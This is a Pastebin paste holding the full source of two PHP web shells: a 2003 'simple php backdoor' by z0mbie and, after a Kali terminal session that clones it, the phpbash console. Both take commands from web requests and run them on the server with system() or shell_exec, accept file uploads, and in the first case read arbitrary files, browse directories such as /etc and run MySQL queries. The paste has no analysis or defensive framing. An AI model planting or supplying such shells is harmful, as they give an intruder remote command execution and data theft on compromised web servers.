Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
- ob_implicit_flush();
- if(isset($_REQUEST['f'])){
- $filename=$_REQUEST['f'];
- $file=fopen("$filename","rb");
- fpassthru($file);
- die;
- }
- if(isset($_REQUEST['d'])){
- $d=$_REQUEST['d'];
- echo "<pre>";
- if ($handle = opendir("$d")) {
- echo "<h2>listing of $d</h2>";
- while ($dir = readdir($handle)){
- if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
- else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
- echo "$dir\n";
- echo "</font></a>";
- }
- } else echo "opendir() failed";
- closedir($handle);
- die ("<hr>");
- }
- if(isset($_REQUEST['c'])){
- echo "<pre>";
- system($_REQUEST['c']);
- die;
- }
- if(isset($_REQUEST['upload'])){
- if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
- else $dir=$_REQUEST['dir'];
- $fname=$HTTP_POST_FILES['file_name']['name'];
- if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
- die('file uploading error.');
- }
- if(isset($_REQUEST['mquery'])){
- $host=$_REQUEST['host'];
- $usr=$_REQUEST['usr'];
- $passwd=$_REQUEST['passwd'];
- $db=$_REQUEST['db'];
- $mquery=$_REQUEST['mquery'];
- mysql_connect("$host", "$usr", "$passwd") or
- die("Could not connect: " . mysql_error());
- mysql_select_db("$db");
- $result = mysql_query("$mquery");
- if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
- while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
- mysql_free_result($result);
- die;
- }
- ?>
- <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
- <form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
- upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir"> <input type="submit" name="upload" value="upload"></form>
- <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
- <br>for example:
- http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
- or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
- <hr>execute mysql query:
- <form action="<? echo $PHP_SELF; ?>" METHOD=GET >
- host:<input type="text" name="host"value="localhost"> user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
- database: <input type="text" name="db"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
- </form>
- <!-- http://michaeldaw.org 2006 -->
- root@kali:~/IDF# git clone https://github.com/Arrexel/phpbash.git
- Cloning into 'phpbash'...
- remote: Enumerating objects: 85, done.
- remote: Total 85 (delta 0), reused 0 (delta 0), pack-reused 85
- Unpacking objects: 100% (85/85), done.
- root@kali:~/IDF# ls
- Bing.url credenitals.txt decrypt.rar hash README.txt
- c2.pcap.rar d2.rar.rar decrypt.rar.rar new run
- Challenge2 d3.rar dec.txt newfile shell.php
- Challenge2.pcap.rar '#decrypt.py#' desktop.ini p0wny-shell WebExploitationTool
- classified_document.txt decrypt.py file phpbash work
- root@kali:~/IDF# cd ph
- bash: cd: ph: No such file or directory
- root@kali:~/IDF# cd phpbash/
- root@kali:~/IDF/phpbash# ls
- LICENSE phpbash.min.php phpbash.php README.md
- root@kali:~/IDF/phpbash# cat phpbash.php
- <?php
- /* phpbash by Alexander Reid (Arrexel) */
- if (ISSET($_POST['cmd'])) {
- $output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1"));
- foreach ($output as $line) {
- echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>";
- }
- die();
- } else if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) {
- $filename = $_FILES["file"]["name"];
- $path = $_POST['path'];
- if ($path != "/") {
- $path .= "/";
- }
- if (move_uploaded_file($_FILES["file"]["tmp_name"], $path.$filename)) {
- echo htmlentities($filename) . " successfully uploaded to " . htmlentities($path);
- } else {
- echo "Error uploading " . htmlentities($filename);
- }
- die();
- }
- ?>
- <html>
- <head>
- <title></title>
- <style>
- html, body {
- max-width: 100%;
- }
- body {
- width: 100%;
- height: 100%;
- margin: 0;
- background: #000;
- }
- body, .inputtext {
- font-family: "Lucida Console", "Lucida Sans Typewriter", monaco, "Bitstream Vera Sans Mono", monospace;
- font-size: 14px;
- font-style: normal;
- font-variant: normal;
- font-weight: 400;
- line-height: 20px;
- overflow: hidden;
- }
- .console {
- width: 100%;
- height: 100%;
- margin: auto;
- position: absolute;
- color: #fff;
- }
- .output {
- width: auto;
- height: auto;
- position: absolute;
- overflow-y: scroll;
- top: 0;
- bottom: 30px;
- left: 5px;
- right: 0;
- line-height: 20px;
- }
- .input form {
- position: relative;
- margin-bottom: 0px;
- }
- .username {
- height: 30px;
- width: auto;
- padding-left: 5px;
- line-height: 30px;
- float: left;
- }
- .input {
- border-top: 1px solid #333333;
- width: 100%;
- height: 30px;
- position: absolute;
- bottom: 0;
- }
- .inputtext {
- width: auto;
- height: 30px;
- bottom: 0px;
- margin-bottom: 0px;
- background: #000;
- border: 0;
- float: left;
- padding-left: 8px;
- color: #fff;
- }
- .inputtext:focus {
- outline: none;
- }
- ::-webkit-scrollbar {
- width: 12px;
- }
- ::-webkit-scrollbar-track {
- background: #101010;
- }
- ::-webkit-scrollbar-thumb {
- background: #303030;
- }
- </style>
- </head>
- <body>
- <div class="console">
- <div class="output" id="output"></div>
- <div class="input" id="input">
- <form id="form" method="GET" onSubmit="sendCommand()">
- <div class="username" id="username"></div>
- <input class="inputtext" id="inputtext" type="text" name="cmd" autocomplete="off" autofocus>
- </form>
- </div>
- </div>
- <form id="upload" method="POST" style="display: none;">
- <input type="file" name="file" id="filebrowser" onchange='uploadFile()' />
- </form>
- <script type="text/javascript">
- var username = "";
- var hostname = "";
- var currentDir = "";
- var previousDir = "";
- var defaultDir = "";
- var commandHistory = [];
- var currentCommand = 0;
- var inputTextElement = document.getElementById('inputtext');
- var inputElement = document.getElementById("input");
- var outputElement = document.getElementById("output");
- var usernameElement = document.getElementById("username");
- var uploadFormElement = document.getElementById("upload");
- var fileBrowserElement = document.getElementById("filebrowser");
- getShellInfo();
- function getShellInfo() {
- var request = new XMLHttpRequest();
- request.onreadystatechange = function() {
- if (request.readyState == XMLHttpRequest.DONE) {
- var parsedResponse = request.responseText.split("<br>");
- username = parsedResponse[0];
- hostname = parsedResponse[1];
- currentDir = parsedResponse[2].replace(new RegExp("/", "g"), "/");
- defaultDir = currentDir;
- usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
- updateInputWidth();
- }
- };
- request.open("POST", "", true);
- request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
- request.send("cmd=whoami; hostname; pwd");
- }
- function sendCommand() {
- var request = new XMLHttpRequest();
- var command = inputTextElement.value;
- var originalCommand = command;
- var originalDir = currentDir;
- var cd = false;
- commandHistory.push(originalCommand);
- switchCommand(commandHistory.length);
- inputTextElement.value = "";
- var parsedCommand = command.split(" ");
- if (parsedCommand[0] == "cd") {
- cd = true;
- if (parsedCommand.length == 1) {
- command = "cd "+defaultDir+"; pwd";
- } else if (parsedCommand[1] == "-") {
- command = "cd "+previousDir+"; pwd";
- } else {
- command = "cd "+currentDir+"; "+command+"; pwd";
- }
- } else if (parsedCommand[0] == "clear") {
- outputElement.innerHTML = "";
- return false;
- } else if (parsedCommand[0] == "upload") {
- fileBrowserElement.click();
- return false;
- } else {
- command = "cd "+currentDir+"; " + command;
- }
- request.onreadystatechange = function() {
- if (request.readyState == XMLHttpRequest.DONE) {
- if (cd) {
- var parsedResponse = request.responseText.split("<br>");
- previousDir = currentDir;
- currentDir = parsedResponse[0].replace(new RegExp("/", "g"), "/");
- outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+originalDir+"# "+originalCommand+"</div><br>";
- usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
- } else {
- outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# "+originalCommand+"</div><br>" + request.responseText.replace(new RegExp("<br><br>$"), "<br>");
- outputElement.scrollTop = outputElement.scrollHeight;
- }
- updateInputWidth();
- }
- };
- request.open("POST", "", true);
- request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
- request.send("cmd="+encodeURIComponent(command));
- return false;
- }
- function uploadFile() {
- var formData = new FormData();
- formData.append('file', fileBrowserElement.files[0], fileBrowserElement.files[0].name);
- formData.append('path', currentDir);
- var request = new XMLHttpRequest();
- request.onreadystatechange = function() {
- if (request.readyState == XMLHttpRequest.DONE) {
- outputElement.innerHTML += request.responseText+"<br>";
- }
- };
- request.open("POST", "", true);
- request.send(formData);
- outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# Uploading "+fileBrowserElement.files[0].name+"...</div><br>";
- }
- function updateInputWidth() {
- inputTextElement.style.width = inputElement.clientWidth - usernameElement.clientWidth - 15;
- }
- document.onkeydown = checkForArrowKeys;
- function checkForArrowKeys(e) {
- e = e || window.event;
- if (e.keyCode == '38') {
- previousCommand();
- } else if (e.keyCode == '40') {
- nextCommand();
- }
- }
- function previousCommand() {
- if (currentCommand != 0) {
- switchCommand(currentCommand-1);
- }
- }
- function nextCommand() {
- if (currentCommand != commandHistory.length) {
- switchCommand(currentCommand+1);
- }
- }
- function switchCommand(newCommand) {
- currentCommand = newCommand;
- if (currentCommand == commandHistory.length) {
- inputTextElement.value = "";
- } else {
- inputTextElement.value = commandHistory[currentCommand];
- setTimeout(function(){ inputTextElement.selectionStart = inputTextElement.selectionEnd = 10000; }, 0);
- }
- }
- document.getElementById("form").addEventListener("submit", function(event){
- event.preventDefault()
- });
- </script>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement